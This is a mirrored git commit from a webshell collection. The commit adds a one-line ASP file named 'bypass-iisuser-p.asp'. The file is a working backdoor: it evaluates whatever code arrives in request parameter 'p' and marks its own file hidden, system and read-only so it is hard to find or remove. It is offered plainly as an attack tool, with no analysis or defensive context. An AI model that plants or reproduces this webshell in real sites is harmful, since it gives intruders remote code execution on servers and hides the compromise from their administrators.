mirror of
https://github.com/tennc/webshell
synced 2025-02-16 09:48:24 +00:00
add a asp webshell
bypass iisuser
This commit is contained in:
parent
3f24988a88
commit
c070f0793f
1 changed files with 1 additions and 0 deletions
1
asp/bypass-iisuser-p.asp
Normal file
1
asp/bypass-iisuser-p.asp
Normal file
|
@ -0,0 +1 @@
|
|||
<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%>
|
Loading…
Add table
Reference in a new issue